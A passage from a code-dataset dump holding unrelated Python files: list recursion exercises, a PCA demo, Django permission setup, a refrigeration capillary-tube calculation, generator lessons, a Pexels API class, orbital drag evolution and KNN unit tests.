1 + size(tail(L))\n\ndef sorted(L):\n if not L:\n return True\n if not tail(L):\n return True\n else:\n C1 = head(L) <= head(tail(L))\n return C1 and sorted(tail(L))\n\ndef sum(L):\n if not (L):\n return 0\n if not tail(L):\n return head(L)\n else:\n return head(L) + sum(tail(L))\n\ndef split(L):\n if not L:\n return (None, None)\n if not tail(L):\n return (L, None)\n else:\n H0 = head(L)\n H1 = (head(tail(L)))\n (T0,T1) = split(tail(tail(L)))\n return ((H0, T0), (H1, T1))\n\ndef merge(L0, L1):\n if not L0:\n return L1\n if not L1:\n return L0\n else:\n H0 = head(L0)\n T0 = tail(L0)\n H1 = head(L1)\n T1 = tail(L1)\n if H0 < H1:\n return (H0, merge(T0, L1))\n else:\n return (H1, merge(L0, T1))\n\ndef mSort(L):\n if not(L):\n return None\n if not tail(L):\n return L\n else:\n (L0, L1) = split(L)\n return merge(mSort(L0), mSort(L1))\n\ndef max(L):\n maior = head(L)\n if not (L):\n return 0\n if not tail(L):\n return head(L)\n if maior <= head(tail(L)):\n return max(tail(L))\n if maior > head(tail(L)):\n retorno = maior, tail(tail(L))\n return max(retorno)\n else:\n return maior\n\ndef get(L, N):\n if not L:\n return None\n if N < 0:\n N = size(L) + N\n for _ in range(0, N):\n L = tail(L)\n return head(L)","repo_name":"LucasAzvd/Composicao-de-Programas-em-Python","sub_path":"Programação Funcional/atv_1.py","file_name":"atv_1.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70575902507","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn\nimport mglearn\n\nfrom sklearn.datasets import load_breast_cancer\n\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\n# PCA 연산 과정 전시\nmglearn.plots.plot_pca_illustration()\nplt.show()\n\n####################################################################################################################################################\n### Dataset Preparation and Analysis ###############################################################################################################\n####################################################################################################################################################\n# 유방암 데이터셋 준비\ncancer = load_breast_cancer()\n\nfig, axes = plt.subplots(6, 5, figsize=(10, 20))\n\nmalignant = cancer.data[cancer.target == 0] # 악성으로 분류된 데이터 준비\nbenign = cancer.data[cancer.target == 1] # 양성으로 분류된 데이터 
준비\n\n# 데이터셋의 각 Feature의 Historgram을 그림\nax = axes.ravel()\nfor i in range(30):\n _, bins = np.histogram(cancer.data[:, i], bins=50)\n ax[i].hist(malignant[:, i], bins=bins, color=mglearn.cm3(0), alpha=.5)\n ax[i].hist(benign[:, i], bins=bins, color=mglearn.cm3(2), alpha=.5)\n ax[i].set_title(cancer.feature_names[i], fontsize=10)\n ax[i].set_yticks(())\n ax[0].set_ylabel(\"Frequency\", fontsize=10)\n ax[0].legend([\"malignant\", \"benign\"], loc=\"best\")\n\nplt.subplots_adjust(left=0.05, right=0.95, top=0.95, bottom=0.05, hspace=0.5)\nplt.show()\n\n# 데이터셋 표준화\nscaler = StandardScaler() # Standard Scaler 준비\nscaler.fit(cancer.data) # 데이터셋에 대한 평균과 표준편차를 산출함\nX_scaled = scaler.transform(cancer.data) # 데이터셋을 표준화함\n\n####################################################################################################################################################\n### Principle Component Analysis of Breast Cancer Dataset ##########################################################################################\n####################################################################################################################################################\npca = PCA(n_components=2) # 2개의 최상 Principle Component를 생성하는 PCA 객체 준비\npca.fit(X_scaled) # 표준화된 데이터셋에 대해 PCA 수행\n\nX_pca = pca.transform(X_scaled) # Principle Component를 기반으로 데이터셋을 재구성함\n\nprint('Original shape : {}'.format(str(X_scaled.shape))) # 원본 데이터의 형태를 출력함\nprint('Reduced shape : {}'.format(str(X_pca.shape))) # PCA 기반으로 재구성된 데이터의 형태를 출력함\n\n####################################################################################################################################################\n### Result Plotting ################################################################################################################################\n####################################################################################################################################################\n\n# 재구성된 데이터셋을 그래프로 그림\nplt.figure(figsize=(8,8))\nmglearn.discrete_scatter(X_pca[:,0], X_pca[:,1],cancer.target)\nplt.legend([\"malignant\", \"benign\"], loc=\"best\")\nplt.gca().set_aspect(\"equal\")\nplt.xlabel(\"First principal component\")\nplt.ylabel(\"Second principal component\") \nplt.show() \n\nprint('PCA shape : ', pca.components_.shape) # Principle Component의 형태를 출력함\n\nprint('PCA components : ', pca.components_) # Principle Component를 출력함\n\n# Principle Component를 그래프로 그림\nplt.matshow(pca.components_, cmap='viridis')\nplt.yticks([0, 1], [\"First component\", \"Second component\"])\nplt.colorbar()\nplt.xticks(range(len(cancer.feature_names)), cancer.feature_names, rotation=60, ha='left')\nplt.xlabel(\"Feature\")\nplt.ylabel(\"Principal components\")\nplt.show()\n\n\n\n","repo_name":"luwis93choi/ML2020_Class","sub_path":"Assignment_07_Dimensionality_Reduction_PCA/KOR/02_1_BreastCancer_PCA_Principle_Component_Analysis.py","file_name":"02_1_BreastCancer_PCA_Principle_Component_Analysis.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44516114108","text":"from django.conf import settings\n\n\ndef init_permission(request,user):\n \"\"\"\n 权限和菜单信息的初始化,以后使用时,需要在登陆成功之后调用该方法将权限和菜单信息放入session\n :param request:\n :param user:\n :return:\n \"\"\"\n\n # 获取用户信息和权限写入session\n permission_quertset = user.userinfo.roles.filter(permissions__url__isnull=False).values('permissions__url',\n 'permissions__is_menu',\n 'permissions__title',\n 
'permissions__icon', ).distinct()\n\n    menu_list = []\n    permission_list = []\n    for row in permission_quertset:\n        permission_list.append({'permissions__url': row['permissions__url']})\n        if row['permissions__is_menu']:\n            menu_list.append(\n                {'title': row['permissions__title'], 'icon': row['permissions__icon'], 'url': row['permissions__url']})\n\n    request.session[settings.PERMISSION_SESSION_KEY] = permission_list\n    request.session[settings.MENU_SESSION_KEY] = menu_list","repo_name":"dengdeng-a/repo2","sub_path":"luffy_permission(示例三)/luffy_permission/rbac/service/init_permission.py","file_name":"init_permission.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24795581113","text":"#1. Input data: geometric and operating conditions.\n#2. Calculate the adiabatic mass flow rate (Eq. (9)) using hi,c as the enthalpy path\n#3. Based on the calculated mass flow rate, calculate:\n\t#a. Number of transfer units (Eq. (15));\n\t#b. Heat exchanger effectiveness (Eq. (12));\n\t#c. Suction line outlet temperature (Eq. (11));\n\t#d. Refrigerant enthalpy at the evaporator inlet (Eq. (10));\n\t#e. Average enthalpy (Eq. (17)).\n#4. Calculate the adiabatic mass flow rate (Eq. (9)) using the\n#refrigerant average enthalpy.\n#5. Calculate the K-multiplier (Eq. (16)) and correct the mass flow rate.\n\nimport numpy as np\nimport CoolProp.CoolProp as cool\n\n\ndef izracun(t, hladivo, prt):\n\t\n\t# Data for step 2 of the algorithm:\n\tD_c\t= t[1]*10**(-3)\t# Capillary tube diameter\t\t[m]\n\tD_s\t= t[2]*10**(-3)\t# Suction line diameter\t\t\t[m] \n\tp_c\t= t[3]*10**5\t# Inlet pressure\t\t\t[Pa]\n\tp_e\t= t[4]*10**5\t# Evaporating pressure\t\t\t[Pa] \n\tdt_sub \t= t[5]\t\t# Subcooling\t\t\t\t[K] \n\n\tfi\t= 6.0\t\t# Capillary constant\t\t\t[/]\n\tL_c\t= 2.7\t\t# Capillary tube length\t\t\t[m]\n\tL_s\t= 1.5\t\t# Suction line length\t\t\t[m]\n\t\n\n\t# Data for step 3 of the algorithm:\n\tt_s_i\t= 273.15 + t[7] # Temperature at the suction line inlet\t[K] \n\n\tc\t= 4\t\t# Constant\t\t\t\t[/] \t\t\n\tn\t= 0.405\t\t# Constant\t\t\t\t[/] \t\t\n\t\n\n\t# Constants for the mass flow rate correction:\n\tc0 \t= 1.103\n\tc1\t= 0.3\n\tc2\t= -0.03\n\tc3\t= -0.450\n\tc4\t= -0.2\n\n\t\n\t\n\t\n\t#2. Calculate the adiabatic mass flow rate (Eq. (9)) using hi,c as the enthalpy path\n\t\n\t# Loop entry data - updated on every iteration\n\tt_sat \t= cool.PropsSI(\"T\", \"Q\", 0, \"P\", p_c, hladivo)\t\t\t# Saturated liquid temperature at the condenser \n\tt_c_i\t= t_sat - dt_sub\t\t\t\t\t\t# Temperature at the capillary inlet\n\th_c_i \t= cool.PropsSI(\"H\", \"T\", t_c_i, \"P\", p_c, hladivo)\t\t# Enthalpy at the capillary inlet\n\tt_s_o\t= t_s_i + 30\t\t\t\t\t\t\t# Initial guess for the suction line outlet temperature\n\tp_i \t= p_c\t\t\t\t\t\t\t\t# Pressure at the capillary tube inlet (equal to the condensing pressure) \n\th_avg \t= h_c_i\t\t\t\t\t\t\t\t# Initial definition of h_avg (computed by the loop) \n\t\n\t\n\t# Variables used to run the iteration\n\tw \t= 3 / 3600\n\ti \t= 0\n\tK \t= 1\n\t\n\twhile(abs(K) > 1e-8 ): \n\t\ti = i+1\n\t\t\n\t\th_f \t= h_avg\t\t\t\t\t\t\t# Enthalpy at the capillary inlet \n\t\tt_f \t= cool.PropsSI(\"T\", \"H\", h_f, \"P\", p_c, hladivo)\t# Temperature at the flash point\n\t\tp_f\t= cool.PropsSI(\"P\", \"Q\", 0, \"T\", t_f, hladivo)\t\t# Pressure at the flash point\n\t\tv_f\t= 1 / (cool.PropsSI(\"D\", \"P\", p_f, \"Q\", 0, hladivo))\t# Specific volume at the flash point\n\t\teta_f\t= cool.PropsSI(\"V\", \"P\", p_f, \"Q\", 0, hladivo)\t\t# Viscosity at the flash point\n\t\t\t\t\t\t\t\t\t\t\n\t\tk = 1.63e5 * p_f**(-0.72)\t\t\t\t\t#\n\t\ta = v_f * (1 - k)\t\t\t\t\t\t# Coefficients\n\t\tb = v_f * p_f * k\t\t\t\t\t\t# \n\t\t\n\t\t# Mass flow rate calculation:\n\t\tw_prev \t= w\t\n\t\tw = fi * np.sqrt((D_c**5 / L_c) * (((p_i - p_f) / v_f) + ((p_f - p_e) / a) + ((b / a**2) * np.log((a * p_e + b) / (a * p_f + b))))) \n\t\t\n\t\tt_s_avg = (t_s_i + t_s_o) / 2\t\t\t\t\t\t# Average temperature in the suction line \t[K]\n\t\tlam_v \t= cool.PropsSI(\"L\", \"H\", h_avg, \"P\", p_e, hladivo)\t\t# Thermal conductivity - saturated liquid [W/mK] \t\t\n\t\teta_v \t= cool.PropsSI(\"V\", \"H\", h_avg, \"P\", p_e, hladivo)\t\t# Viscosity - saturated liquid\t\t[Pa s]\n\t\tc_p_v \t= cool.PropsSI(\"C\", \"H\", h_avg, \"P\", p_e, hladivo)\t\t# Specific heat - saturated liquid\t[J/kgK] \n\t\tv_v\t= 1 / (cool.PropsSI(\"D\", \"H\", h_avg, \"P\", p_e, hladivo))\t# Specific volume - saturated liquid\t[m3/kg]\n\t\tc_p_s \t= cool.PropsSI(\"C\", \"P\", p_e, \"T\", t_s_avg, hladivo)\t\t# Specific heat in the suction line\t[J/kgK]\n\t\t\n\t\t#3. Based on the calculated mass flow rate, calculate:\n\t\t\t#a. Number of transfer units (Eq. (15));\n\t\t\t#b. Heat exchanger effectiveness (Eq. (12));\n\t\t\t#c. Suction line outlet temperature (Eq. (11));\n\t\t\t#d. Refrigerant enthalpy at the evaporator inlet (Eq. (10));\n\t\t\t#e. Average enthalpy (Eq. (17)).\n\t\t\n\t\tNTU = (c * w**(n - 1) * L_s * lam_v**(2/3)) / (D_s**n * eta_v**(n - (1/3)) * c_p_v**(2/3))\t# Number of Transfer Units\n\t\teps = NTU / (1 + NTU)\t\t\t\t\t\t\t\t\t\t# Heat exchanger effectiveness\n\t\tt_s_o = t_s_i + eps * (t_c_i - t_s_i)\t\t\t\t\t\t\t\t# Temperature at the suction line outlet\n\t\th_c_o = h_c_i - eps * c_p_s * (t_c_i - t_s_i) \t\t\t\t\t\t\t# Enthalpy at the capillary outlet\n\t\t\n\t\n\t\th_avg = 0.5 * (h_c_i + h_c_o) \n\t\tK = 1 - (w_prev / w)\n\n\n\n\n\n\t\tif(prt == 1): \n\t\t\tprint(\"Iteration\", i) \n\t\t\tprint(\"Mass flow rate =\", w * 3600) \n\t\t\tprint(\"K_multiplier =\", K) \n\t\t\tprint(\"c_p_s\", c_p_s) \n\t\t\tprint(\"pressure\", p_f * 10**(-5))\n\t\t\tprint(\"v_f\", v_f)\n\t\t\tprint(\"difference\", t_s_o - t_s_i) \n\t\t\tprint(\"eps\", eps) \n\t\t\tprint(\"tso\", t_s_o) \n\t\t\tprint(\"\\n\") \n\t\t\n\n\n\tw \t= c0 * (L_s / L_c)**(c1) * (D_s / D_c)**(c2) * eps**c3 * ((v_f * eta_f) / (v_v * eta_v))**(c4) * w\t\n\n\n\treturn np.array([i, t_s_o - 273.15, w * 3600, eps]) \n\n\n","repo_name":"zigaPerne/fs-projects","sub_path":"spoj-kapilarne-in-sesalne-cevi-koda/izracun.py","file_name":"izracun.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72862300214","text":"# Design a data structure that will be initialized with a string array, and then it should answer queries of the shortest distance between two different strings from the array.\n\n# Implement the WordDistance class:\n\n# WordDistance(String[] wordsDict) initializes the object with the strings array wordsDict.\n# int shortest(String word1, String word2) returns the shortest distance between word1 and word2 in the array wordsDict.\n\nfrom collections import defaultdict\nfrom typing import List\n\n\nclass WordDistance:\n\n    def __init__(self, wordsDict: List[str]):\n        self.words = wordsDict\n        self.pos = defaultdict(list)\n        for index,word in enumerate(wordsDict):\n            self.pos[word].append(index)\n\n    def shortest(self, word1: str, word2: str) -> int:\n        m = float('inf')\n        for idx1 in self.pos[word1]:\n            for idx2 in self.pos[word2]:\n                m = min(m,abs(idx1 - idx2))\n        return m \n\n# Time complexity of initialization is O(N). 
Time complexity of the shortest operation is O(K*L) over the two words' occurrence lists, i.e. O(N^2) in the worst case\n\n# Space complexity is O(N)","repo_name":"conor47/Algorithm-Patterns","sub_path":"General Problems/HashTable/shortestWordDistance2.py","file_name":"shortestWordDistance2.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33007623966","text":"# class FishInventory:\n#     def __init__(self, fishList):\n#         self.available_fish = fishList\n\n#     def __iter__(self):\n#         self.index = 0\n#         return self\n    \n    \n#     def __next__(self):\n#         if self.index < len(self.available_fish):\n#             fish_status = self.available_fish[self.index]\n#             self.index += 1\n#             return fish_status\n#         else: \n#             raise StopIteration\n\n\n# fish_inventory_cls = FishInventory(['Bubbles', 'Finley', 'Moby'])\n# for fish in fish_inventory_cls:\n#     print(fish)\n\n# ==============================\n# create __iter__ and __next__ methods for the CustomerCounter class that \n# return the number of customers and stop once their number \n# exceeds 100\n\n\n# class CustomerCounter:\n#     def __init__(self, customerList):\n#         self.customers = customerList\n\n#     def __iter__(self):\n#         self.count = 0\n#         return self\n    \n#     def __next__(self):\n#         if self.count > 99:\n#             raise StopIteration\n#         self.count += 1\n#         return self.count\n\n    \n# customer_cls = CustomerCounter(list(range(110)))\n# for customer in customer_cls:\n#     print(customer)\n# ========================================================================\n\nfrom itertools import count, chain, combinations \n\n#count(start, [step])\nfor i in count(start = 0, step =2):\n    # it takes a start and a step\n    print(i)\n    if i >= 20:\n        break\n\nodd = [5,7,9]\neven = {10,12,14}\n# ==========================================\nall_numbers = chain(odd, even)\n# chains the two iterables into one sequence: the first list comes first, then the second\nfor num in all_numbers:\n    print(num)\n\n# ===============================================\neven = [2,4,6]\neven_combinations = list(combinations(even, 2))\n    # it takes two arguments: the iterable and the combination size \n\nprint(even_combinations)\n# [(2, 4), (2, 6), (4, 6)]\n# combinations = returns the possible combinations of the list\n\n# collars = ['red-s', 'red-x', 'blue-xs', 'green-l', 'yellow-m']\n# collars_combo_iterator = combinations(collars, 3)\n\n# for collar in collars_combo_iterator:\n#     print(collar)\n\n# ===========================================================\n\n# GENERATOR FUNCTION\n\n\"\"\"yield is a Python keyword used to return from a function while preserving the state of its local variables;\nwhen such a function is called again, execution resumes from the yield statement where it left off. \nAny function containing the yield keyword is called a generator.\"\"\"\ndef get_list():\n    for x in [1,2,3,4]:\n        yield x\n\na=get_list()\n\n# print(next(a))\n# print(next(a))\n# print(next(a))\n# print(next(a))\n# print(next(a)) # stopIteration\n\n# for x in a:\n#     print(x)\n\n# # ======================================================\n\n# def fib(n):\n#     if n==1:\n#         return 0\n#     if n==2:\n#         return 1\n#     else: \n#         return fib(n-1)+fib(n-2)\n\n# print(fib(5))\n\n# Generator expressions\nprint((i for i in range(100000000)))\ndef multiply(a,b):\n    sum=0\n    return a*b\n\nprint(multiply(3,6))\n\ndef course_generator():\n    yield 'Computer Science'\n    yield 'Art'\n    yield 'Business'\n\ncourses=course_generator()\nfor course in courses:\n    print(course)\n\n# ---------------------------------------------------------\n\n\n# ---------------------------------------------------------\ndef prize_generator():\n    student_info={\n        'Joan Tsark':355,\n        'Bekzod':123,\n        'Sabina':12,\n        'Kate':45\n\n    }\n\n    for student in student_info:\n        name=student\n        id=student_info[name]\n        if id%3==0 and id%5==0:\n            yield student+\" Get prize C\"\n        elif id%3==0:\n            yield student+\" Get prize B\"\n        elif id%5==0:\n            yield student+\" Get prize A\"\n\nprizes=prize_generator()\nfor prize in prizes:\n    print(prize)\n\n\ndef factorial_generator(n):\n    term = 1\n\n    for i in range(1, n + 1): \n        c = term * i\n        yield c\n        term = c\n\nfact = factorial_generator\n\n","repo_name":"arssabina/FSPR-422","sub_path":"semester_2_Behruz/lessons/25_05.py","file_name":"25_05.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3661787194","text":"from .liblogging import logger\nfrom random import randint\nfrom .errors import PexelsError\nfrom .models import Photo\nfrom .pexelspage import PexelsPage\nfrom .settings import API_VERSION\n\n\nclass Random(PexelsPage):\n\n    def __init__(self, api_key, url='/curated', api_version=API_VERSION, **kwargs):\n        valid_options = ['page', 'per_page']\n        self.entries_count = kwargs.get('per_page', 0)\n        kwargs['per_page'] = 1\n        kwargs['page'] = 1\n        super(Random, self).__init__(url=url, api_key=api_key, api_version=api_version, valid_options=valid_options, **kwargs)\n\n    @property\n    def entries(self):\n        for _ in range(self.entries_count):\n            random_page = randint(1, 1000)\n            random_collection = self.get_page(random_page)\n            for entry in random_collection.body.get('photos', []):\n                yield Photo.parse(entry)\n\n    @property\n    def has_next(self):\n        # You can continue to get pages of random photos forever\n        return True\n\n    @property\n    def has_previous(self):\n        # You can't go back in time: no history is kept (for now)\n        return False\n","repo_name":"salvoventura/pypexels","sub_path":"pypexels/src/random_.py","file_name":"random_.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"21"} +{"seq_id":"35485805203","text":"@jit\ndef oldPREvolve(a,e,T,Rfrag):\n    Timestep=1*year\n    #print(Timestep)\n    TempT=int(10**3.)\n    ShowT=int(T/TempT)\n    Data=np.zeros((3,ShowT+1)) #a,e\n    TempData=np.zeros((3,TempT+1))\n    Data[0,:]=np.arange(0, ShowT+1)*Timestep*ShowT\n    Data[1:,0]=[a,e]\n    L=Luminosity((np.arange(0,T+1))+0.5e9)\n    #plt.plot(Data[0, :], L, label='L')\n    econstant=((5*Q)/(8*np.pi*(c**2.)))*(3/(Rfrag*Density))\n    aconstant=(Q/(4*np.pi*(c**2.)))*(3/(Rfrag*Density))\n    for tshow in range(0,ShowT):\n        TempData[1:,0]=Data[1:,tshow]\n\n        for t in range(0,TempT):\n            l=L[t+(tshow*TempT)]\n            
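            # Forward-Euler step for the orbital elements a and e; the update terms below are consistent with the standard Poynting-Robertson drag rates da/dt and de/dt, scaled by the time-dependent stellar luminosity L.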
TempData[1, t + 1] = TempData[1, t] - Timestep*(aconstant * L[t+(tshow*TempT)] * (2 + (3 * (TempData[2, t] ** 2.)))) / (\n TempData[1, t] * ((1 - (TempData[2, t] ** 2.)) ** 1.5)) #a\n TempData[2,t+1]=TempData[2,t]-Timestep*((econstant*L[t+(tshow*TempT)]*TempData[2,t])/((TempData[1,t]**2.)*(np.sqrt(1-(TempData[2,t]**2.)))))#e\n if TempData[1, t + 1]<(10**-2)*au:\n TempData[1, t + 1]=(10**-2)*au\n TempData[2,t+1]=0\n break\n Data[1:,tshow+1]=TempData[1:,TempT]\n if Data[1, tshow + 1] < (10 ** -2) * au:\n Data[1, tshow + 1] = (10 ** -2) * au\n Data[2, tshow + 1] = 0\n break\n return Data","repo_name":"TomMCallingham/SpaggetiAstro","sub_path":"Masters/Old/OldPReVolve.py","file_name":"OldPReVolve.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"533220183","text":"import importlib\nimport os\n\nimport json\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport pytest\n\nfrom scipy.stats import chisquare\nfrom scipy.stats import ks_2samp\nfrom sklearn.neighbors import KDTree\nfrom sklearn.neighbors import KNeighborsRegressor\n\nfrom cgpm.knn.mvknn import MultivariateKnn\nfrom cgpm.utils import general as gu\nfrom cgpm.utils import test as tu\n\n\nO = 'outputs'\nST = 'stattypes'\nSA = 'statargs'\nN = 'numerical'\nC = 'nominal'\n\n\ndef test_initialize():\n # This test ensures that MvKnn raises on bad initialize arguments.\n # Typical initialization.\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs={O: {ST: [N, C], SA: [{}, {'k': 2}]}})\n # No inputs allowed.\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=[2], K=2,\n distargs={O: {ST:[N, C], SA: [{}, {'k': 2}]}})\n # At least two output.\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[], inputs=[], K=2,\n distargs={O: {ST: [], SA:[]}})\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[1], inputs=[], K=2,\n distargs={O: {ST: [], SA:[]}})\n # Unique outputs.\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 0], inputs=None, K=2,\n distargs={O: {ST: [N, C], SA: [{}, {'k': 2}]}})\n # Ensure outputs in distargs.\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs=None)\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs={'output': {ST: [N, C], SA: [{}, {'k': 2}]}})\n # Ensure stattypes and statargs in distargs['outputs]'\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs={O: {'stattype': [N, C], SA :[{}, {'k': 2}]}})\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs={O: {ST: [N, C], 'eland': [{}, {'k': 2}]}})\n # Ensure stattypes correct length.\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs={O: {ST: [N, C, N], SA: [{}, {'k': 2}]}})\n # Ensure statargs correct length.\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs={O: {ST: [N, C], SA: [{}, None, {'k': 2}]}})\n # Ensure number of categories provided as k.\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs={O: {ST: [N, C], SA: [{}, {'h': 2}]}})\n with pytest.raises(ValueError):\n MultivariateKnn(\n outputs=[0, 1], inputs=None, K=2,\n distargs={O: {ST: [N, C], SA: [{}, {}]}})\n # Missing number of nearest neighbors K.\n with 
pytest.raises(ValueError):\n        MultivariateKnn(\n            outputs=[0, 1], inputs=None,\n            distargs={O: {ST: [N, C], SA: [{}, {'k': 2}]}})\n    # Bad number of nearest neighbors K.\n    with pytest.raises(ValueError):\n        MultivariateKnn(\n            outputs=[0, 1], inputs=None, K=0,\n            distargs={O: {ST: [N, C], SA: [{}, {'k': 2}]}})\n    with pytest.raises(ValueError):\n        MultivariateKnn(\n            outputs=[0, 1], inputs=None, K=-1,\n            distargs={O: {ST: [N, C], SA: [{}, {'k': 2}]}})\n\n\ndef test_find_neighborhoods():\n    # This test targets _find_neighborhoods from MultivariateKnn. See the\n    # inline comments for the description of each test.\n\n    # Generate a high dimensional dataset with mixed numerical/categorical.\n    rng = gu.gen_rng(1)\n\n    outputs = range(11)\n    inputs = None\n    K = 5\n    stattypes = [N, N, C, N, N, N, C, N, N, C, N]\n    statargs = [{}, {}, {'k':7}, {}, {}, {}, {'k':1}, {}, {}, {'k':5}, {}]\n    distargs = {'outputs': {'stattypes': stattypes, 'statargs': statargs}}\n\n    X = rng.rand(100, 11)\n    X[:,2] = rng.choice(range(statargs[2]['k']), size=100)\n    X[:,6] = rng.choice(range(statargs[6]['k']), size=100)\n    X[:,9] = rng.choice(range(statargs[9]['k']), size=100)\n    X[:96,10] = np.nan\n\n    knn = MultivariateKnn(outputs, inputs, K=K, distargs=distargs)\n\n    for i, x in enumerate(X):\n        knn.incorporate(i, dict(zip(outputs, x)))\n\n    assert knn.N == len(X)\n\n    # Neighbor search needs evidence.\n    with pytest.raises(ValueError):\n        knn._find_neighborhoods(query=[0,1], evidence=None)\n    with pytest.raises(ValueError):\n        knn._find_neighborhoods(query=[0,1], evidence={})\n\n    # Bad category 199.\n    with pytest.raises(ValueError):\n        knn._find_neighborhoods(query=[0,1], evidence={2:199, 5:.8})\n\n    # Check the returned K and dimension are correct while varying query/evidence.\n    for q, e in [\n        ([0,1], {5:.8}),\n        ([0,1,7], {5:.8}),\n        ([4], {5:.8, 7:0})\n    ]:\n        d, nh = knn._find_neighborhoods(query=q, evidence=e)\n        assert len(nh) == K\n        for n in nh:\n            assert 1 <= len(n) <= K\n            assert d[n].shape[1] == len(q)\n\n    # Dimension 10 has only 4 non-nan values, so K=5 will fail.\n    with pytest.raises(ValueError):\n        knn._find_neighborhoods(query=[0,1], evidence={10:.8})\n    with pytest.raises(ValueError):\n        knn._find_neighborhoods(query=[10,1], evidence={5:.8})\n\n    # Now furnish dimension 10 with one additional non-nan value and ensure the\n    # K=5 neighbors are the only possible ones i.e. 0, 96, 97, 98, 99.\n    knn.data[0][10] = 1\n\n    def test_found_expected(dataset, neighborhoods, expect):\n        for e in expect:\n            match = False\n            for n in neighborhoods:\n                match = match or any(np.allclose(dataset[i], e) for i in n)\n            assert match\n\n    d_found, n_found = knn._find_neighborhoods(query=[0,1], evidence={10:.8})\n    expected = [np.asarray(knn.data[r])[[0,1]]\n        for r in [0, 96, 97, 98, 99]]\n    test_found_expected(d_found, n_found, expected)\n\n    d_found, n_found = knn._find_neighborhoods(query=[10,1], evidence={5:.8})\n    expected = [np.asarray(knn.data[r])[[10,1]]\n        for r in [0, 96, 97, 98, 99]]\n    test_found_expected(d_found, n_found, expected)\n\n    # Now make sure an exact match is in the nearest neighbor.\n    z = knn.data[19]\n\n    # First, crash since z contains a nan.\n    with pytest.raises(ValueError):\n        knn._find_neighborhoods([0,1], dict(zip(outputs[2:], z[2:])))\n\n    # Now make sure that z is its own nearest neighbor.\n    z_query = [0,1]\n    z_evidence = {o:v for o,v in zip(outputs[2:], z[2:]) if not np.isnan(v)}\n    d_found, n_found = knn._find_neighborhoods(z_query, z_evidence)\n    test_found_expected(d_found, n_found, [z[:2]])\n\n\ndef test_perigee_period_given_apogee():\n    # This test uses 
KNN to answer two BQL queries.\n    # SIMULATE perigee_km, period_minutes GIVEN apogee_km = 500;\n    # SIMULATE apogee_km, period_minutes;\n    # The outputs of the query are scattered on a plot.\n\n    rng = gu.gen_rng(1)\n\n    # Load the satellites dataset.\n    filename = os.path.join(\n        os.path.dirname(__file__), 'graphical/resources/satellites.csv')\n    satellites = pd.read_csv(filename)\n\n    # Extract target columns of interest.\n    D = satellites[['Apogee_km', 'Perigee_km', 'Period_minutes']].dropna()\n    X = np.asarray(D)\n\n    # Extract the nearest neighbors given A=500.\n    tree = KDTree(X[:,0].reshape(-1,1))\n    _, neighbors = tree.query([[500]], k=20)\n    perigees = X[neighbors[0][:10],1]\n    periods = X[neighbors[0][:10],2]\n\n    # Learn the joint distribution by assuming P,T|A are independent.\n    perigees_ind = rng.normal(np.mean(perigees), np.std(perigees), size=20)\n    periods_ind = rng.normal(np.mean(periods), np.std(periods), size=20)\n\n    # Create a KNN.\n    distargs = {\n        'outputs': {\n            'stattypes': ['numerical', 'numerical', 'numerical'],\n            'statargs': [{}, {}, {}]\n        }}\n    knn = MultivariateKnn([0,1,2], None, distargs=distargs, K=30, rng=rng)\n    for i, row in enumerate(X):\n        knn.incorporate(i, dict(zip([0,1,2], row)))\n\n    # Sample from the dependent KNN.\n    samples_dep = knn.simulate(-1, [1,2], {0: 500}, N=20)\n    logpdfs = [knn.logpdf(-1, s, {0: 500}) for s in samples_dep]\n    assert all(not np.isinf(l) for l in logpdfs)\n\n    # Create an axis.\n    fig, ax = plt.subplots()\n\n    # Scatter the actual neighborhood.\n    ax.scatter(perigees, periods, color='b', label='Actual Satellites')\n\n    # Plot the independent knn.\n    ax.scatter(\n        perigees_ind, periods_ind, color='r', alpha=.5,\n        label='Independent KNN')\n\n    # Plot the dependent knn.\n    ax.scatter(\n        [s[1] for s in samples_dep], [s[2] for s in samples_dep],\n        color='g', alpha=.5, label='Dependent KNN')\n\n    # Prepare the axes.\n    ax.set_title(\n        'SIMULATE Perigee_km, Period_minutes GIVEN Apogee_km = 500',\n        fontweight='bold')\n    ax.set_xlabel('Perigee', fontweight='bold')\n    ax.set_ylabel('Period', fontweight='bold')\n    ax.grid()\n    ax.legend(framealpha=0, loc='upper left')\n\n    # Now simulate from the 